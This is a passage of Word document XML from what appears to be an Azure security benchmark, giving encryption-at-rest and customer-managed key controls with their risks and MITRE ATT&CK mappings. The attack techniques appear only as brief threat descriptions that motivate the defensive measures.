        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Defense Evasion (TA0005)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481209DE" w14:textId="666B9DA8" w:rsidR="00E02617" w:rsidRDefault="00E02617" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02617">
        <w:t>indicator removal (T1070) editing or purging logs following offline media / snapshot access.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABF40DF" w14:textId="012EC187" w:rsidR="006225D4" w:rsidRDefault="006225D4" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="006225D4">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45351164" w14:textId="2DE2E398" w:rsidR="00E02617" w:rsidRDefault="00E02617" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02617">
        <w:t>data destruction (T1485) corrupting unencrypted dormant assets to disrupt downstream processes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AA592" w14:textId="2DCC6795" w:rsidR="00E02617" w:rsidRDefault="00E02617" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02617">
        <w:t>inhibit system recovery (T1490) deleting or altering unencrypted backups and recovery catalogs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342D92EC" w14:textId="0ED80169" w:rsidR="00E02617" w:rsidRDefault="00E02617" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="381"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00E02617">
        <w:t>data manipulation (T1565) subtly modifying stored reference or configuration data to cause later-stage logic faults.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C9F68B" w14:textId="03A91E90" w:rsidR="00F82EB7" w:rsidRDefault="00F82EB7" w:rsidP="00F82EB7">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F82EB7">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>DP-4.1: Enable data at rest encryption by default</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF49A97" w14:textId="06F73D8A" w:rsidR="00F82EB7" w:rsidRDefault="00F82EB7" w:rsidP="00CA7928">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00F82EB7">
        <w:t>Ensure all data stored in Azure is encrypted at rest to protect against unauthorized access from infrastructure compromise, stolen media, or unauthorized snapshots</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79667738" w14:textId="0CDF09F3" w:rsidR="00AA7052" w:rsidRDefault="00AA7052">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA7052">
        <w:t>Enable encryption for VMs and storage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C6F052" w14:textId="38B0C29D" w:rsidR="004E4417" w:rsidRDefault="004E4417" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004E4417">
        <w:t xml:space="preserve">Enable encryption-at-host for Azure Virtual Machines to encrypt temp disks, OS disk cache, data disk cache, and ephemeral OS disks before data reaches Azure Storage. Register the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E4417">
        <w:t>EncryptionAtHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E4417">
        <w:t xml:space="preserve"> feature at the subscription level and deploy VMs using supported VM sizes (e.g., DSv3, Easv4, Dadsv5 series)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B714E87" w14:textId="57909483" w:rsidR="004E4417" w:rsidRDefault="004E4417" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004E4417">
        <w:t>Enable infrastructure encryption (double encryption) for Azure Storage accounts requiring additional encryption layers. This provides two layers of AES-256 encryption with different keys at both the service and infrastructure levels—configure during storage account creation as it cannot be enabled after creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3283EA2B" w14:textId="0B8BA0F6" w:rsidR="004E4417" w:rsidRDefault="004E4417">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="004E4417">
        <w:t>Deploy confidential computing and column-level encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221266FC" w14:textId="4DF957AD" w:rsidR="004E4417" w:rsidRDefault="004E4417" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004E4417">
        <w:t xml:space="preserve">Deploy Azure Confidential VMs with confidential disk encryption for highly regulated workloads processing export-controlled or sensitive data. Use DCasv5/DCadsv5-series (AMD SEV-SNP) or ECasv5/ECadsv5-series (Intel TDX) with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="004E4417">
        <w:t>vTPM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="004E4417">
        <w:t>-bound disk encryption keys to ensure data remains encrypted during processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CC6128" w14:textId="02FE8989" w:rsidR="004E4417" w:rsidRDefault="004E4417" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="004E4417">
        <w:t>For Azure SQL Database, implement Always Encrypted to provide client-side column-level encryption for highly sensitive data (SSN, credit card numbers, medical records) where data remains encrypted even from database administrators, cloud operators, and high-privileged but unauthorized users. Use Always Encrypted with secure enclaves (Intel SGX) to enable richer queries on encrypted columns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA4A970" w14:textId="561A790B" w:rsidR="00DB1127" w:rsidRDefault="00DB1127">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00DB1127">
        <w:t>Monitor and enforce encryption compliance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0596AE54" w14:textId="7C45CEAC" w:rsidR="00DB1127" w:rsidRDefault="00DB1127" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB1127">
        <w:t>Enforce encryption compliance using Azure Policy by assigning built-in policies such as "Virtual machines should enable encryption at host," "Storage accounts should have infrastructure encryption," and "Transparent Data Encryption on SQL databases should be enabled" at subscription or management group scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D3E00" w14:textId="248A9402" w:rsidR="00DB1127" w:rsidRDefault="00DB1127" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00DB1127">
        <w:t>Use Azure Resource Graph to query and inventory encryption configurations across your environment, identifying VMs without encryption-at-host, storage accounts without infrastructure encryption, or databases without TDE enabled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3C4EB" w14:textId="6FB98136" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00645080">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="44" w:name="_Toc242449507"/>
      <w:r w:rsidRPr="00645080">
        <w:t>DP-5: Use customer-managed key option in data at rest encryption when required</w:t>
      </w:r>
      <w:bookmarkEnd w:id="44"/>
    </w:p>
    <w:p w14:paraId="7E28D935" w14:textId="69C603F1" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Security principle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF5ACE6" w14:textId="3570A9E2" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:lastRenderedPageBreak/>
        <w:t>Use customer-managed keys when regulatory compliance, contractual requirements, or data sensitivity demands direct control over encryption key lifecycle, including key generation, rotation, and revocation authority. Ensure proper key management processes are in place to handle the operational overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34213A9B" w14:textId="6FF908B8" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve">Risk </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645080">
        <w:t>to mitigate</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="376FE22F" w14:textId="5CBC23C6" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Inadequate regulatory assurance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA0EF74" w14:textId="7D506893" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Auditors may reject evidence of cryptographic control if key custody, rotation cadence, or revocation authority can't be demonstrated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0127D233" w14:textId="18455821" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Revocation latency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108620A3" w14:textId="6BE99A58" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Inability to rapidly revoke or rotate compromised platform keys extends exposure window after credential or supply chain events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D264B7D" w14:textId="118D9D9F" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Jurisdictional exposure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE595AA" w14:textId="4EF00CA2" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Data sovereignty mandates may require tenant-operated or HSM-backed keys—absence impairs regional deployment viability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2123EAB3" w14:textId="147C2B18" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Cross-tenant blast radius</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F192E7" w14:textId="7ED61D43" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Multi-tenant platform key compromise can impact broad datasets when cryptographic isolation is insufficient</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEF1CE5" w14:textId="52887C8D" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve">Shadow </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645080">
        <w:t>proliferation</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="16FFD23F" w14:textId="0E77CF00" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve">Ad-hoc CMK deployments without lifecycle governance </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645080">
        <w:t>lead</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve"> to stale, orphaned, or weak keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156BA2E1" w14:textId="30E120EC" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Operational fragility</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1904F625" w14:textId="500EB521" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="117"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Poor rotation automation or missing dependency mapping causes application outages during key rollover</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589E59AD" w14:textId="77777777" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="001A2291"/>
    <w:p w14:paraId="6F07D062" w14:textId="77777777" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="001A2291"/>
    <w:p w14:paraId="30BBA109" w14:textId="77777777" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="001A2291"/>
    <w:p w14:paraId="67CE58D1" w14:textId="60D4B82A" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="116"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>MITRE ATT&amp;CK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245F4E3F" w14:textId="583A8E1E" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Credential Access (TA0006)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="224849D7" w14:textId="2E6D8725" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>unprotected credentials (T1552) exposed by weakly safeguarded or improperly segmented platform keys.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77EAE818" w14:textId="12BBFD12" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Impact (TA0040)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A625C25" w14:textId="4EBFA0E2" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>data encrypted for impact (T1486) abusing CMK rotation / revocation to render data inaccessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632F7D6C" w14:textId="116B891E" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>data manipulation (T1565) modifying encryption state metadata to desynchronize protection layers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDDFF15" w14:textId="4EC607C4" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:lastRenderedPageBreak/>
        <w:t>Exfiltration (TA0010)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06BF3AEE" w14:textId="515A14A9" w:rsidR="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>transfer data to cloud account (T1537) re-encrypting and exporting datasets into attacker-controlled storage.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B31429E" w14:textId="37A441C8" w:rsidR="00105F1F" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="382"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>exfiltration over web services (T1567) orchestrating high-volume, key-enabled bulk exports under normal service patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9E6FE" w14:textId="253F85CF" w:rsidR="00105F1F" w:rsidRDefault="00645080" w:rsidP="00645080">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:rPr>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>DP-5.1: Use customer-managed key option in data at rest encryption when required</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0BC272" w14:textId="6319DAAC" w:rsidR="001A2291" w:rsidRPr="001A2291" w:rsidRDefault="001A2291" w:rsidP="00261B5A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="001A2291">
        <w:t>Implement customer-managed keys when regulatory compliance, data sovereignty mandates, or contractual obligations require direct control over encryption key custody, rotation schedules, and revocation authority. For workloads requiring ultimate control where even Microsoft cannot decrypt data, implement Double Key Encryption (DKE) where your organization maintains a second encryption key outside Azure. Use Azure Key Vault or Managed HSM to maintain cryptographic control while balancing the operational complexity of key lifecycle management, disaster recovery planning, and potential service availability impacts from key management errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B154727" w14:textId="68210D39" w:rsidR="00645080" w:rsidRDefault="00645080">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="118"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Evaluate CMK requirements and provision key infrastructure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC9A454" w14:textId="4A03D803" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Evaluate regulatory, compliance, or business requirements to determine which workloads need customer-managed keys (CMK) instead of platform-managed keys. Common drivers include data sovereignty, audit requirements, or contractual obligations for direct key custody</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058CFBD5" w14:textId="64AA2830" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Provision Azure Key Vault (Standard or Premium) or Azure Key Vault Managed HSM to store and manage customer-managed encryption keys. Use Managed HSM for workloads requiring FIPS 140-3 Level 3 validated hardware protection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9E76E7" w14:textId="45D49DF1" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Generate encryption keys within Azure Key Vault using key generation capabilities, or import keys from on-premises HSMs using Bring Your Own Key (BYOK) for maximum portability and control</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3139790D" w14:textId="2FCEB4A2" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Configure CMK and establish key hierarchy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACCC962" w14:textId="3CE137E4" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve">For extreme control requirements, implement Double Key Encryption (DKE) where sensitive documents require two keys for decryption: one managed by Microsoft (Azure RMS) and a second key managed exclusively by your organization </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00645080">
        <w:t>on-premises</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00645080">
        <w:t xml:space="preserve"> or in your own external key management service. With DKE, Microsoft cannot decrypt your data even if compelled by legal process, as you control the second key required for decryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106D5E5E" w14:textId="003CBE86" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="008C463A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:t>Configure Azure services (Azure Storage, Azure SQL Database, Azure Cosmos DB, Azure Disk Encryption, etc.) to use CMK by referencing the Key Vault key URI. Enable automatic key rotation policies to reduce manual operational burden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C805345" w14:textId="0A53C162" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00080172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
        <w:lastRenderedPageBreak/>
        <w:t>Establish a key encryption key (KEK) and data encryption key (DEK) hierarchy where the KEK (stored in Key Vault) encrypts the DEK (used by services), minimizing the impact of key rotation on service availability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76530128" w14:textId="4551BE15" w:rsidR="00645080" w:rsidRDefault="00645080" w:rsidP="00080172">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r w:rsidRPr="00645080">
